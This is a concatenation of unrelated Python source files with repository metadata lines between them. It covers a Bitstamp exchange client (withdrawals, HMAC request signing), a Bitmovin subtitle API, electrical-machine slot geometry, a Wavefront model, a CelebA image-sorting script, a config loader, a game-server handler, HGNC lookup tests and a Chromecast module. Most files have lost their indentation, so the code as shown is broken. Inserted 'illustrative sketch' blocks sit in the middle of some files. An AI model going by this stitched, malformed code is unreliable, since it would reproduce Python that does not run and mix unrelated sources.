if not self.is_fiat(code):
name = self.get_currency_name(code)
method = 'privatePost' + self.capitalize(name) + 'Withdrawal'
if code == 'XRP':
if tag is not None:
request['destination_tag'] = tag
elif code == 'XLM' or code == 'HBAR':
if tag is not None:
request['memo_id'] = tag
request['address'] = address
else:
method = 'privatePostWithdrawalOpen'
currency = self.currency(code)
request['iban'] = address
request['account_currency'] = currency['id']
response = await getattr(self, method)(self.extend(request, params))
return self.parse_transaction(response, currency)
def nonce(self):
return self.milliseconds()
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'][api] + '/'
url += self.version + '/'
url += self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if api == 'public':
if query:
url += '?' + self.urlencode(query)
else:
self.check_required_credentials()
xAuth = 'BITSTAMP ' + self.apiKey
xAuthNonce = self.uuid()
xAuthTimestamp = str(self.milliseconds())
xAuthVersion = 'v2'
contentType = ''
headers = {
'X-Auth': xAuth,
'X-Auth-Nonce': xAuthNonce,
'X-Auth-Timestamp': xAuthTimestamp,
'X-Auth-Version': xAuthVersion,
}
if method == 'POST':
if query:
body = self.urlencode(query)
contentType = 'application/x-www-form-urlencoded'
headers['Content-Type'] = contentType
else:
# sending an empty POST request will trigger
# an API0020 error returned by the exchange
# therefore for empty requests we send a dummy object
# https://github.com/ccxt/ccxt/issues/6846
body = self.urlencode({'foo': 'bar'})
contentType = 'application/x-www-form-urlencoded'
headers['Content-Type'] = contentType
authBody = body if body else ''
auth = xAuth + method + url.replace('https://', '') + contentType + xAuthNonce + xAuthTimestamp + xAuthVersion + authBody
signature = self.hmac(self.encode(auth), self.encode(self.secret))
headers['X-Auth-Signature'] = signature
return {'url': url, 'method': method, 'body': body, 'headers': headers}
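# Illustrative example: for a private POST to the balance endpoint, the string
# signed above is 'BITSTAMP ' + apiKey + 'POST' + 'www.bitstamp.net/api/v2/balance/'
# + contentType + nonce + timestamp + 'v2' + body, i.e. exactly the concatenation
# order used to build the auth variable.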
def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return
#
# {"error": "No permission found"} # fetchDepositAddress returns self on apiKeys that don't have the permission required
# {"status": "error", "reason": {"__all__": ["Minimum order size is 5.0 EUR."]}}
# reuse of a nonce gives: {status: 'error', reason: 'Invalid nonce', code: 'API0004'}
status = self.safe_string(response, 'status')
error = self.safe_value(response, 'error')
if (status == 'error') or (error is not None):
errors = []
if isinstance(error, str):
errors.append(error)
elif error is not None:
keys = list(error.keys())
for i in range(0, len(keys)):
key = keys[i]
value = self.safe_value(error, key)
if isinstance(value, list):
errors = self.array_concat(errors, value)
else:
errors.append(value)
reason = self.safe_value(response, 'reason', {})
if isinstance(reason, str):
errors.append(reason)
else:
all = self.safe_value(reason, '__all__', [])
for i in range(0, len(all)):
errors.append(all[i])
code = self.safe_string(response, 'code')
if code == 'API0005':
raise AuthenticationError(self.id + ' invalid signature, use the uid for the main account if you have subaccounts')
feedback = self.id + ' ' + body
for i in range(0, len(errors)):
value = errors[i]
self.throw_exactly_matched_exception(self.exceptions['exact'], value, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], value, feedback)
raise ExchangeError(feedback)
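# --- Illustrative sketch (not part of the original source) ---
# A standalone rendition of the v2 request signing performed in sign() above,
# assuming hypothetical credentials; the exchange class derives the nonce and
# timestamp at request time and signs with HMAC-SHA256 via self.hmac().
import hashlib
import hmac
import time
import uuid

def sketch_bitstamp_sign(api_key, secret, http_method, url_without_scheme, body=''):
    x_auth = 'BITSTAMP ' + api_key
    x_auth_nonce = str(uuid.uuid4())
    x_auth_timestamp = str(int(time.time() * 1000))
    x_auth_version = 'v2'
    content_type = 'application/x-www-form-urlencoded' if body else ''
    # concatenation order mirrors the auth string assembled in sign()
    auth = (x_auth + http_method + url_without_scheme + content_type
            + x_auth_nonce + x_auth_timestamp + x_auth_version + body)
    signature = hmac.new(secret.encode(), auth.encode(), hashlib.sha256).hexdigest()
    return {
        'X-Auth': x_auth,
        'X-Auth-Nonce': x_auth_nonce,
        'X-Auth-Timestamp': x_auth_timestamp,
        'X-Auth-Version': x_auth_version,
        'X-Auth-Signature': signature,
    }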
| 40.501832
| 279
| 0.458759
|
f424e4da64f09e94ce31d4d87005b5c24a66de08
| 4,319
|
py
|
Python
|
bitmovin_api_sdk/encoding/encodings/input_streams/subtitles/dvb_teletext/dvb_teletext_api.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 11
|
2019-07-03T10:41:16.000Z
|
2022-02-25T21:48:06.000Z
|
bitmovin_api_sdk/encoding/encodings/input_streams/subtitles/dvb_teletext/dvb_teletext_api.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 8
|
2019-11-23T00:01:25.000Z
|
2021-04-29T12:30:31.000Z
|
bitmovin_api_sdk/encoding/encodings/input_streams/subtitles/dvb_teletext/dvb_teletext_api.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 13
|
2020-01-02T14:58:18.000Z
|
2022-03-26T12:10:30.000Z
|
# coding: utf-8
from __future__ import absolute_import
from bitmovin_api_sdk.common import BaseApi, BitmovinApiLoggerBase
from bitmovin_api_sdk.common.poscheck import poscheck_except
from bitmovin_api_sdk.models.bitmovin_response import BitmovinResponse
from bitmovin_api_sdk.models.dvb_teletext_input_stream import DvbTeletextInputStream
from bitmovin_api_sdk.models.response_envelope import ResponseEnvelope
from bitmovin_api_sdk.models.response_error import ResponseError
from bitmovin_api_sdk.encoding.encodings.input_streams.subtitles.dvb_teletext.dvb_teletext_input_stream_list_query_params import DvbTeletextInputStreamListQueryParams
class DvbTeletextApi(BaseApi):
@poscheck_except(2)
def __init__(self, api_key, tenant_org_id=None, base_url=None, logger=None):
# type: (str, str, str, BitmovinApiLoggerBase) -> None
super(DvbTeletextApi, self).__init__(
api_key=api_key,
tenant_org_id=tenant_org_id,
base_url=base_url,
logger=logger
)
def create(self, encoding_id, dvb_teletext_input_stream, **kwargs):
# type: (string_types, DvbTeletextInputStream, dict) -> DvbTeletextInputStream
"""Add DVB-Teletext Input Stream
:param encoding_id: Id of the encoding.
:type encoding_id: string_types, required
:param dvb_teletext_input_stream: The DVB-Teletext Input Stream to be created
:type dvb_teletext_input_stream: DvbTeletextInputStream, required
:return: DVB-Teletext Input Stream
:rtype: DvbTeletextInputStream
"""
return self.api_client.post(
'/encoding/encodings/{encoding_id}/input-streams/subtitles/dvb-teletext',
dvb_teletext_input_stream,
path_params={'encoding_id': encoding_id},
type=DvbTeletextInputStream,
**kwargs
)
def delete(self, encoding_id, input_stream_id, **kwargs):
# type: (string_types, string_types, dict) -> BitmovinResponse
"""Delete DVB-Teletext Input Stream
:param encoding_id: Id of the encoding.
:type encoding_id: string_types, required
:param input_stream_id: Id of the DVB-Teletext input stream.
:type input_stream_id: string_types, required
:return: Id of the DVB-Teletext Input stream
:rtype: BitmovinResponse
"""
return self.api_client.delete(
'/encoding/encodings/{encoding_id}/input-streams/subtitles/dvb-teletext/{input_stream_id}',
path_params={'encoding_id': encoding_id, 'input_stream_id': input_stream_id},
type=BitmovinResponse,
**kwargs
)
def get(self, encoding_id, input_stream_id, **kwargs):
# type: (string_types, string_types, dict) -> DvbTeletextInputStream
"""DVB-Teletext Input Stream Details
:param encoding_id: Id of the encoding.
:type encoding_id: string_types, required
:param input_stream_id: Id of the DVB-Teletext input stream.
:type input_stream_id: string_types, required
:return: DVB-Teletext Input Stream
:rtype: DvbTeletextInputStream
"""
return self.api_client.get(
'/encoding/encodings/{encoding_id}/input-streams/subtitles/dvb-teletext/{input_stream_id}',
path_params={'encoding_id': encoding_id, 'input_stream_id': input_stream_id},
type=DvbTeletextInputStream,
**kwargs
)
def list(self, encoding_id, query_params=None, **kwargs):
# type: (string_types, DvbTeletextInputStreamListQueryParams, dict) -> DvbTeletextInputStream
"""List DVB-Teletext Input Streams
:param encoding_id: Id of the encoding.
:type encoding_id: string_types, required
:param query_params: Query parameters
:type query_params: DvbTeletextInputStreamListQueryParams
:return: List of DVB-Teletext Input Streams
:rtype: DvbTeletextInputStream
"""
return self.api_client.get(
'/encoding/encodings/{encoding_id}/input-streams/subtitles/dvb-teletext',
path_params={'encoding_id': encoding_id},
query_params=query_params,
pagination_response=True,
type=DvbTeletextInputStream,
**kwargs
)
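# --- Illustrative usage sketch (not part of the original source) ---
# Drives the class above with hypothetical placeholder ids; only the methods
# and constructor arguments visible in this file are used, and the input
# stream model is assumed to be built elsewhere.
def _example_dvb_teletext_usage(api_key, encoding_id, input_stream):
    api = DvbTeletextApi(api_key=api_key)
    created = api.create(encoding_id=encoding_id, dvb_teletext_input_stream=input_stream)
    details = api.get(encoding_id=encoding_id, input_stream_id=created.id)
    listed = api.list(encoding_id=encoding_id)
    api.delete(encoding_id=encoding_id, input_stream_id=created.id)
    return details, listed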
| 41.528846
| 166
| 0.693448
|
55b444075dea2be0072acdd8a4545d953a852d4a
| 2,267
|
py
|
Python
|
pyleecan/Methods/Slot/SlotW15/_comp_point_coordinate.py
|
ajpina/pyleecan
|
f8d1fce7d108cf443f5767e35d59ff15905fb49f
|
[
"Apache-2.0"
] | 2
|
2019-06-08T15:04:39.000Z
|
2020-09-07T13:32:22.000Z
|
pyleecan/Methods/Slot/SlotW15/_comp_point_coordinate.py
|
ajpina/pyleecan
|
f8d1fce7d108cf443f5767e35d59ff15905fb49f
|
[
"Apache-2.0"
] | null | null | null |
pyleecan/Methods/Slot/SlotW15/_comp_point_coordinate.py
|
ajpina/pyleecan
|
f8d1fce7d108cf443f5767e35d59ff15905fb49f
|
[
"Apache-2.0"
] | null | null | null |
from numpy import angle, arcsin, arctan, cos, exp, pi, sin, sqrt
from ....Methods.Slot.SlotW15 import S15InnerError
def _comp_point_coordinate(self):
"""Compute the point coordinates needed to plot the Slot.
Parameters
----------
self : SlotW15
A SlotW15 object
Returns
-------
point_list: list
A list of 12 Points
"""
Rbo = self.get_Rbo()
# alpha is the angle to rotate Z0 so ||Z1,Z13|| = W0
alpha = arcsin(self.W0 / (2 * Rbo))
hsp = pi / self.Zs # Half slot pitch
Z0 = Rbo * exp(1j * 0)
Z1 = Z0 * exp(1j * alpha)
if self.is_outwards():
Z2 = Z0 + self.H0 + 1j * Z1.imag
Z7 = Z0 + self.H0 + self.H1 + self.H2
# Zc2, Z6 and (0,0) are align (tangent) => abs(Zc2)=Rbo+H0+H1+H2-R2
# In tooth ref: Im(Zc2') = -W3/2 - R2
A = Rbo + self.H0 + self.H1 + self.H2 - self.R2
B = -self.W3 / 2 - self.R2
xc2 = B * sin(-hsp) + sqrt(-(B ** 2) + A ** 2) * cos(-hsp)
yc2 = B * cos(-hsp) - sqrt(-(B ** 2) + A ** 2) * sin(-hsp)
Zc2 = xc2 + 1j * yc2
Z5 = (Zc2 * exp(1j * -hsp) + self.R2 * 1j) * exp(1j * hsp)
# Zc2, Z6 and (0,0) are align, |Zc2, Z6| = R2
Z6 = (Zc2 * exp(1j * -angle(Zc2)) + self.R2) * exp(1j * angle(Zc2))
# Real(Zc1) = Rbo+H0+H1
# In tooth ref: Im(Zc1') = -W3/2 - R1
xc1 = Rbo + self.H0 + self.H1
yc1 = (-self.W3 / 2 - self.R1 - xc1 * sin(-hsp)) / cos(-hsp)
Zc1 = xc1 + 1j * yc1
Z4 = (Zc1 * exp(1j * -hsp) + self.R1 * 1j) * exp(1j * hsp)
# Ref center at Zc1, (Z3,Z2) and (Z3,Zc1) are orthogonal
# Z3 = R1*exp(1i*theta)
# (R1*cos(theta)-x2)*R1*cos(theta)+(R1*sin(theta)-y2)*R1*sin(theta) = 0
R1 = self.R1
y2 = (Z2 - Zc1).imag
x2 = (Z2 - Zc1).real
theta = 2 * arctan((y2 - sqrt(-(R1 ** 2) + x2 ** 2 + y2 ** 2)) / (R1 + x2))
Z3 = R1 * exp(1j * theta) + Zc1
else:
raise S15InnerError("Slot Type 15 can't be used on inner lamination")
# symetry
Z8 = Z6.conjugate()
Z9 = Z5.conjugate()
Z10 = Z4.conjugate()
Z11 = Z3.conjugate()
Z12 = Z2.conjugate()
Z13 = Z1.conjugate()
return [Z13, Z12, Z11, Z10, Z9, Z8, Z7, Z6, Z5, Z4, Z3, Z2, Z1]
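# --- Illustrative numeric sketch (not part of the original source) ---
# Evaluates the opening-angle relation used above, alpha = arcsin(W0 / (2 * Rbo)),
# for hypothetical slot dimensions and places Z1 on the bore radius.
from numpy import arcsin, exp, pi

Rbo_demo = 0.05   # hypothetical bore radius [m]
W0_demo = 0.004   # hypothetical slot opening width [m]
Zs_demo = 36      # hypothetical slot count
alpha_demo = arcsin(W0_demo / (2 * Rbo_demo))
hsp_demo = pi / Zs_demo                    # half slot pitch
Z1_demo = Rbo_demo * exp(1j * alpha_demo)  # first slot point on the bore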
| 32.385714
| 83
| 0.505073
|
ac3366f96112505ab20c0d59d749c71f9b140848
| 4,993
|
py
|
Python
|
wavefront_api_client/models/response_container_paged_report_event_anomaly_dto.py
|
httpsgithu/python-client
|
f85a530367cdabe458a11919ad35609b9bc0606b
|
[
"Apache-2.0"
] | null | null | null |
wavefront_api_client/models/response_container_paged_report_event_anomaly_dto.py
|
httpsgithu/python-client
|
f85a530367cdabe458a11919ad35609b9bc0606b
|
[
"Apache-2.0"
] | null | null | null |
wavefront_api_client/models/response_container_paged_report_event_anomaly_dto.py
|
httpsgithu/python-client
|
f85a530367cdabe458a11919ad35609b9bc0606b
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Wavefront REST API Documentation
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: chitimba@wavefront.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from wavefront_api_client.configuration import Configuration
class ResponseContainerPagedReportEventAnomalyDTO(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'response': 'PagedReportEventAnomalyDTO',
'status': 'ResponseStatus'
}
attribute_map = {
'response': 'response',
'status': 'status'
}
def __init__(self, response=None, status=None, _configuration=None): # noqa: E501
"""ResponseContainerPagedReportEventAnomalyDTO - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._response = None
self._status = None
self.discriminator = None
if response is not None:
self.response = response
self.status = status
@property
def response(self):
"""Gets the response of this ResponseContainerPagedReportEventAnomalyDTO. # noqa: E501
:return: The response of this ResponseContainerPagedReportEventAnomalyDTO. # noqa: E501
:rtype: PagedReportEventAnomalyDTO
"""
return self._response
@response.setter
def response(self, response):
"""Sets the response of this ResponseContainerPagedReportEventAnomalyDTO.
:param response: The response of this ResponseContainerPagedReportEventAnomalyDTO. # noqa: E501
:type: PagedReportEventAnomalyDTO
"""
self._response = response
@property
def status(self):
"""Gets the status of this ResponseContainerPagedReportEventAnomalyDTO. # noqa: E501
:return: The status of this ResponseContainerPagedReportEventAnomalyDTO. # noqa: E501
:rtype: ResponseStatus
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this ResponseContainerPagedReportEventAnomalyDTO.
:param status: The status of this ResponseContainerPagedReportEventAnomalyDTO. # noqa: E501
:type: ResponseStatus
"""
if self._configuration.client_side_validation and status is None:
raise ValueError("Invalid value for `status`, must not be `None`") # noqa: E501
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ResponseContainerPagedReportEventAnomalyDTO, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ResponseContainerPagedReportEventAnomalyDTO):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ResponseContainerPagedReportEventAnomalyDTO):
return True
return self.to_dict() != other.to_dict()
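# --- Illustrative usage sketch (not part of the original source) ---
# Round-trips the auto-generated model through to_dict(); the `status`
# argument is a hypothetical placeholder for a ResponseStatus instance.
def _example_container_roundtrip(status):
    container = ResponseContainerPagedReportEventAnomalyDTO(response=None, status=status)
    duplicate = ResponseContainerPagedReportEventAnomalyDTO(response=None, status=status)
    return container.to_dict(), container == duplicate  # dict view, True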
| 33.066225
| 409
| 0.629281
|
018f7479f5a19b76fef4aa8529da886f2f2b94f0
| 806
|
py
|
Python
|
class_separation.py
|
UmarKhalidcs/ACL-for-Face-Recognition
|
e10f1f870dfc86382c8acfc9fcc23ab39bd14c92
|
[
"MIT"
] | null | null | null |
class_separation.py
|
UmarKhalidcs/ACL-for-Face-Recognition
|
e10f1f870dfc86382c8acfc9fcc23ab39bd14c92
|
[
"MIT"
] | null | null | null |
class_separation.py
|
UmarKhalidcs/ACL-for-Face-Recognition
|
e10f1f870dfc86382c8acfc9fcc23ab39bd14c92
|
[
"MIT"
] | null | null | null |
import os
import shutil
identity_CelebA_text = open('D:\\Research_work\\project_3\\umar_version\\data\\celeba\\identity_CelebA.txt', 'r')
Lines = identity_CelebA_text.readlines()
img_align_celeb_path="D:\\Research_work\\project_3\\umar_version\\data\celeba\\img_align_celeba\\"
classified_path="D:\\Research_work\\project_3\\umar_version\\data\celeba\\data\\"
# Strips the newline character
for line in Lines:
b,a=line.strip().split()
class_path = os.path.join(classified_path, a)
orig_img_path = img_align_celeb_path + b
if os.path.isdir(class_path):
        new_image_path = class_path + "\\" + b
        shutil.copy(orig_img_path, new_image_path)
else:
os.mkdir(class_path)
new_image_path = class_path + "\\" + b
shutil.copy(orig_img_path, new_image_path)
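# --- Illustrative sketch (not part of the original source) ---
# A more portable variant of the copy loop above, assuming the same
# identity_CelebA.txt layout ("<image> <class>" per line); os.path.join and
# makedirs(exist_ok=True) replace the hard-coded backslashes and isdir branch.
def _sort_images(identity_file, image_dir, output_dir):
    with open(identity_file, 'r') as handle:
        for entry in handle:
            image_name, class_id = entry.strip().split()
            class_dir = os.path.join(output_dir, class_id)
            os.makedirs(class_dir, exist_ok=True)
            shutil.copy(os.path.join(image_dir, image_name),
                        os.path.join(class_dir, image_name))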
| 44.777778
| 114
| 0.712159
|
ac988d542207d0026ff192cba4c6cb7bc5154993
| 515
|
py
|
Python
|
blog/conf/__init__.py
|
lingfromSh/blog
|
190e4c1162c7fb31f88b7e8f806ccdd9aace6e93
|
[
"Apache-2.0"
] | null | null | null |
blog/conf/__init__.py
|
lingfromSh/blog
|
190e4c1162c7fb31f88b7e8f806ccdd9aace6e93
|
[
"Apache-2.0"
] | 3
|
2020-09-11T14:52:00.000Z
|
2020-09-11T15:17:54.000Z
|
blog/conf/__init__.py
|
lingfromSh/blog
|
190e4c1162c7fb31f88b7e8f806ccdd9aace6e93
|
[
"Apache-2.0"
] | null | null | null |
import importlib
PythonPath = str
class LazyConfig:
def from_object(self, config: object):
def is_dunder_name(name: str):
return name.startswith("__") and name.endswith("__")
for attr_name in dir(config):
if not is_dunder_name(attr_name):
setattr(self, attr_name, getattr(config, attr_name))
def set_project_config(file: PythonPath):
global settings
obj = importlib.import_module(file)
settings.from_object(obj)
settings = LazyConfig()
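# --- Illustrative usage sketch (not part of the original source) ---
# from_object can be driven directly with any object carrying settings
# attributes; _DemoSettings is a hypothetical example. For a real project,
# set_project_config("blog.conf.dev") would import a hypothetical settings
# module and load it into the global `settings`.
class _DemoSettings:
    DEBUG = True
    DATABASE_URL = "sqlite:///demo.db"  # hypothetical value

_demo_config = LazyConfig()
_demo_config.from_object(_DemoSettings)
assert _demo_config.DEBUG is True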
| 23.409091
| 68
| 0.673786
|
9e2843d0e74a6190c921616e6bc81c27fa01da69
| 891
|
py
|
Python
|
World/Object/Unit/Player/Handlers/PlayerInit.py
|
sergio-ivanuzzo/idewave-core
|
31b2b2ec4ac222e02af57d8b2d7a3277e4a444ae
|
[
"Apache-2.0"
] | 10
|
2019-06-29T19:24:52.000Z
|
2021-02-21T22:45:57.000Z
|
World/Object/Unit/Player/Handlers/PlayerInit.py
|
sergio-ivanuzzo/wowcore
|
31b2b2ec4ac222e02af57d8b2d7a3277e4a444ae
|
[
"Apache-2.0"
] | 4
|
2019-08-15T07:03:36.000Z
|
2021-06-02T13:01:25.000Z
|
World/Object/Unit/Player/Handlers/PlayerInit.py
|
sergio-ivanuzzo/idewave-core
|
31b2b2ec4ac222e02af57d8b2d7a3277e4a444ae
|
[
"Apache-2.0"
] | 8
|
2019-06-30T22:47:48.000Z
|
2021-02-20T19:21:30.000Z
|
from World.Object.Unit.Player.PlayerManager import PlayerManager
from Server.Registry.QueuesRegistry import QueuesRegistry
from Server.Connection.Connection import Connection
class PlayerInit(object):
__slots__ = ('data', 'connection')
def __init__(self, **kwargs):
self.data: bytes = kwargs.pop('data', bytes())
self.connection: Connection = kwargs.pop('connection')
async def process(self) -> tuple:
self._load_player()
await QueuesRegistry.connections_queue.put(self.connection)
return None, None
def _load_player(self) -> None:
# size (first 2 bytes) - opcode (next 4 bytes) - guid (remaining bytes)
guid = int.from_bytes(self.data, 'little')
with PlayerManager() as player_mgr:
player_mgr.load(id=guid)
player = player_mgr.player
self.connection.player = player
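# --- Illustrative sketch (not part of the original source) ---
# Demonstrates the little-endian decode used in _load_player on a hypothetical
# 4-byte guid payload; the real handler receives the raw bytes from the client.
_demo_guid_bytes = (42).to_bytes(4, 'little')
assert int.from_bytes(_demo_guid_bytes, 'little') == 42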
| 31.821429
| 79
| 0.674523
|
66183d6364472c48a89f3e18e569aa4ded43aa2b
| 327
|
py
|
Python
|
addons/utils/checks.py
|
T3CHNOLOG1C/GLaDOS
|
723da47178c395e37828f067b3e0def9735609a5
|
[
"Apache-2.0"
] | 5
|
2018-07-19T19:57:59.000Z
|
2020-04-13T00:16:26.000Z
|
addons/utils/checks.py
|
T3CHNOLOG1C/GLaDOS
|
723da47178c395e37828f067b3e0def9735609a5
|
[
"Apache-2.0"
] | 11
|
2018-07-19T19:24:44.000Z
|
2020-04-29T00:28:38.000Z
|
addons/utils/checks.py
|
T3CHNOLOG1C/GLaDOS
|
723da47178c395e37828f067b3e0def9735609a5
|
[
"Apache-2.0"
] | 32
|
2018-03-20T00:08:54.000Z
|
2020-02-15T04:54:18.000Z
|
from discord.ext.commands import check
def _check_owner(ctx):
return ctx.bot.owner_role in ctx.message.author.roles
def _check_botdev(ctx):
return ctx.bot.botdev_role in ctx.message.author.roles or _check_owner(ctx)
def is_owner():
return check(_check_owner)
def is_botdev():
return check(_check_botdev)
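# --- Illustrative usage sketch (not part of the original source) ---
# Shows how these checks attach to a discord.ext command; the command name and
# reply text are hypothetical.
from discord.ext import commands

@commands.command()
@is_owner()
async def shutdown(ctx):
    await ctx.send("Shutting down.")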
| 19.235294
| 79
| 0.75841
|
9f6597edde5a6c28397edf1e98ad587909067b1a
| 2,441
|
py
|
Python
|
indra/tests/test_hgnc_client.py
|
qiuhaoling/indra
|
fa1fb31c4333ea63d023181eaf6f759e3dd3b400
|
[
"BSD-2-Clause"
] | null | null | null |
indra/tests/test_hgnc_client.py
|
qiuhaoling/indra
|
fa1fb31c4333ea63d023181eaf6f759e3dd3b400
|
[
"BSD-2-Clause"
] | null | null | null |
indra/tests/test_hgnc_client.py
|
qiuhaoling/indra
|
fa1fb31c4333ea63d023181eaf6f759e3dd3b400
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
from indra.databases import hgnc_client
from indra.util import unicode_strs
from nose.plugins.attrib import attr
def test_get_uniprot_id():
hgnc_id = '6840'
uniprot_id = hgnc_client.get_uniprot_id(hgnc_id)
assert uniprot_id == 'Q02750'
assert unicode_strs(uniprot_id)
def test_get_uniprot_id_none():
# This HGNC entry doesn't have a UniProt ID
hgnc_id = '12027'
uniprot_id = hgnc_client.get_uniprot_id(hgnc_id)
assert uniprot_id is None
def test_get_hgnc_name():
hgnc_id = '3236'
hgnc_name = hgnc_client.get_hgnc_name(hgnc_id)
assert hgnc_name == 'EGFR'
assert unicode_strs(hgnc_name)
@attr('webservice')
def test_get_hgnc_name_nonexistent():
hgnc_id = '123456'
hgnc_name = hgnc_client.get_hgnc_name(hgnc_id)
assert hgnc_name is None
assert unicode_strs(hgnc_name)
def test_entrez_hgnc():
entrez_id = '653509'
hgnc_id = hgnc_client.get_hgnc_from_entrez(entrez_id)
assert hgnc_id == '10798'
def test_entrez_hgnc_none():
entrez_id = 'xxx'
hgnc_id = hgnc_client.get_hgnc_from_entrez(entrez_id)
assert hgnc_id is None
def test_mouse_map():
hgnc_id1 = hgnc_client.get_hgnc_from_mouse('109599')
hgnc_id2 = hgnc_client.get_hgnc_from_mouse('MGI:109599')
assert hgnc_id1 == '4820'
assert hgnc_id2 == '4820'
hgnc_id = hgnc_client.get_hgnc_from_mouse('xxx')
assert hgnc_id is None
def test_rat_map():
hgnc_id1 = hgnc_client.get_hgnc_from_rat('6496784')
hgnc_id2 = hgnc_client.get_hgnc_from_rat('RGD:6496784')
assert hgnc_id1 == '44155'
assert hgnc_id2 == '44155'
hgnc_id = hgnc_client.get_hgnc_from_rat('xxx')
assert hgnc_id is None
def test_is_category():
assert hgnc_client.is_kinase('MAPK1')
assert not hgnc_client.is_kinase('EGF')
assert hgnc_client.is_phosphatase('PTEN')
assert not hgnc_client.is_phosphatase('KRAS')
assert hgnc_client.is_transcription_factor('FOXO3')
assert not hgnc_client.is_transcription_factor('AKT1')
def test_get_current_id():
# Current symbol
assert hgnc_client.get_current_hgnc_id('BRAF') == '1097'
# Outdated symbol, one ID
assert hgnc_client.get_current_hgnc_id('SEPT7') == '1717'
# Outdated symbol, multiple IDs
ids = hgnc_client.get_current_hgnc_id('HOX1')
assert len(ids) == 10
assert '5101' in ids
| 28.717647
| 72
| 0.736583
|
1604e72f9507574b4506dca839c84d0e96c6e95c
| 10,685
|
py
|
Python
|
homeassistant/components/chromecast.py
|
EnTeQuAk/home-assistant
|
f9fbb30fc0905a9d1858cb5829a6d9c16a9c50de
|
[
"MIT"
] | 1
|
2019-06-27T11:32:36.000Z
|
2019-06-27T11:32:36.000Z
|
homeassistant/components/chromecast.py
|
EnTeQuAk/home-assistant
|
f9fbb30fc0905a9d1858cb5829a6d9c16a9c50de
|
[
"MIT"
] | null | null | null |
homeassistant/components/chromecast.py
|
EnTeQuAk/home-assistant
|
f9fbb30fc0905a9d1858cb5829a6d9c16a9c50de
|
[
"MIT"
] | 1
|
2015-06-16T19:42:51.000Z
|
2015-06-16T19:42:51.000Z
|
"""
homeassistant.components.chromecast
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Provides functionality to interact with Chromecasts.
"""
import logging
import homeassistant.util as util
import homeassistant.components as components
DOMAIN = 'chromecast'
DEPENDENCIES = []
SERVICE_YOUTUBE_VIDEO = 'play_youtube_video'
ENTITY_ID_FORMAT = DOMAIN + '.{}'
STATE_NO_APP = 'idle'
ATTR_STATE = 'state'
ATTR_OPTIONS = 'options'
ATTR_MEDIA_STATE = 'media_state'
ATTR_MEDIA_CONTENT_ID = 'media_content_id'
ATTR_MEDIA_TITLE = 'media_title'
ATTR_MEDIA_ARTIST = 'media_artist'
ATTR_MEDIA_ALBUM = 'media_album'
ATTR_MEDIA_IMAGE_URL = 'media_image_url'
ATTR_MEDIA_VOLUME = 'media_volume'
ATTR_MEDIA_DURATION = 'media_duration'
MEDIA_STATE_UNKNOWN = 'unknown'
MEDIA_STATE_PLAYING = 'playing'
MEDIA_STATE_STOPPED = 'stopped'
def is_on(hass, entity_id=None):
""" Returns true if specified ChromeCast entity_id is on.
Will check all chromecasts if no entity_id specified. """
entity_ids = [entity_id] if entity_id else hass.get_entity_ids(DOMAIN)
return any(not hass.states.is_state(entity_id, STATE_NO_APP)
for entity_id in entity_ids)
def turn_off(hass, entity_id=None):
""" Will turn off specified Chromecast or all. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_TURN_OFF, data)
def volume_up(hass, entity_id=None):
""" Send the chromecast the command for volume up. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_VOLUME_UP, data)
def volume_down(hass, entity_id=None):
""" Send the chromecast the command for volume down. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_VOLUME_DOWN, data)
def media_play_pause(hass, entity_id=None):
""" Send the chromecast the command for play/pause. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_MEDIA_PLAY_PAUSE, data)
def media_play(hass, entity_id=None):
""" Send the chromecast the command for play/pause. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_MEDIA_PLAY, data)
